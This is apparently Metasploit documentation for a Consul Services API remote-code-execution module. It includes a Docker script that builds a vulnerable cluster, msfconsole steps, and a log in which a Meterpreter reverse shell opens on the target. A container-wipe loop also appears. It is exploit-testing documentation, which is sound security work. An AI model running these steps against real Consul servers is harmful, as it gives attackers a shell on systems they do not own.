adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
e10792f4e6032a2e97a1900197e740d7c798e754
metasploit-gs/documentation/modules/exploit/multi/misc/consul_service_exec.md
T
Quentin Kaiser 01f0a11777 Hashicorp Consul RCE via Services API (documentation).
2018-08-10 22:45:58 +02:00

4.3 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits Hashicorp Consul's Services API to gain remote command execution on a Consul node.

The exposure of the Services API depends on the enable_script_checks option. This option is opt-in for Consul nodes operators.

References

Test setup

The following bash script can be used to setup a testing environment with Docker:

#!/bin/sh

echo "[+] Launching consul instances..."
docker run -d --name=consul_bootstrap_server consul agent -server -client=172.17.0.1 -bootstrap -data-dir /tmp/consul
sleep 2

docker run -d --name=consul_server_1 consul agent -server -client=172.17.0.2 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.2

docker run -d --name=consul_server_2 consul agent -server -client=172.17.0.3 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.3

docker run -d -e 'CONSUL_LOCAL_CONFIG={"leave_on_terminate": true, "enable_script_checks":true}' consul agent -ui -client=172.17.0.4 -retry-join=172.17.0.1

sleep 4
echo "[+] Checking members..."
docker exec -t consul_bootstrap_server consul members -http-addr="172.17.0.1:8500"

You should observe something similar to the excerpt below when running the script:

sudo ./launch.sh
[+] Launching consul instances...
3ca869f66e7dda89f7e239a8d2ae6e477af699a20c90f2d1e2043dc90bdfa78c
fa16999754063a23687809c9dbdbabb5e8d45a54652e6e2023c67fd933d83826
Successfully joined cluster by contacting 1 nodes.
ecc11744530e63e8d9cb349e98811e2b88d67dd09a81f7a7e8fee129b72d17cf
Successfully joined cluster by contacting 1 nodes.
949d81b0c47b004d456b1db8c5452bbebe08fe99127f0bc365d417a56fada540
[+] Checking members...
Node          Address          Status  Type    Build  Protocol  DC   Segment
3ca869f66e7d  172.17.0.1:8301  alive   server  1.0.6  2         dc1  <all>
ecc11744530e  172.17.0.3:8301  alive   server  1.0.6  2         dc1  <all>
fa1699975406  172.17.0.2:8301  alive   server  1.0.6  2         dc1  <all>
949d81b0c47b  172.17.0.4:8301  alive   client  1.0.6  2         dc1  <default>

The following bash script can be used to stop and destroy all your running docker containers (so be careful if you use docker containers for other things at the same time):

#!/bin/sh
for h in `sudo docker ps | grep -v CONTAINER | cut -d' ' -f1`; do sudo docker stop $h && sudo docker rm $h; done

Verification Steps

You can verify the module against the vulnerable application with those steps:

  1. Launch a Consul cluster with the provided bash script
  2. Start msfconsole
  3. Do: use exploit/multi/misc/consul_service_exec
  4. Do: set RHOST 172.17.0.4
  5. Do: set RPORT 8500
  6. Do: check. The target should appear vulnerable.
  7. Do: set payload with the payload of your choosing.
  8. Do: set LHOST 172.17.42.1 (docker0 gateway IP)
  9. Do: run
  10. You should get a shell.

Scenarios

Reverse shell on Linux host

Exploit running against a Docker consul container target:

msf5 > use exploit/multi/misc/consul_service_exec
msf5 exploit(multi/misc/consul_service_exec) > set RHOSTS 172.17.0.4
RHOSTS => 172.17.0.4
msf5 exploit(multi/misc/consul_service_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/consul_service_exec) > set LHOST 172.17.42.1
LHOST => 172.17.42.1
msf5 exploit(multi/misc/consul_service_exec) > check
[+] 172.17.0.4:8500 The target is vulnerable.
msf5 exploit(multi/misc/consul_rexec_exec) > run

[*] Started reverse TCP handler on 172.17.42.1:4444
[*] Creating service 'BBBDX'
[*] Service 'BBBDX' successfully created.
[*] Waiting for service 'BBBDX' script to trigger
[*] Sending stage (861480 bytes) to 172.17.0.4
[*] Removing service 'BBBDX'
[*] Command Stager progress - 115.73% done (883/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.4
OS           :  (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.17.0.4 - Meterpreter session 1 closed.  Reason: User exit
Reference in New Issue View Git Blame Copy Permalink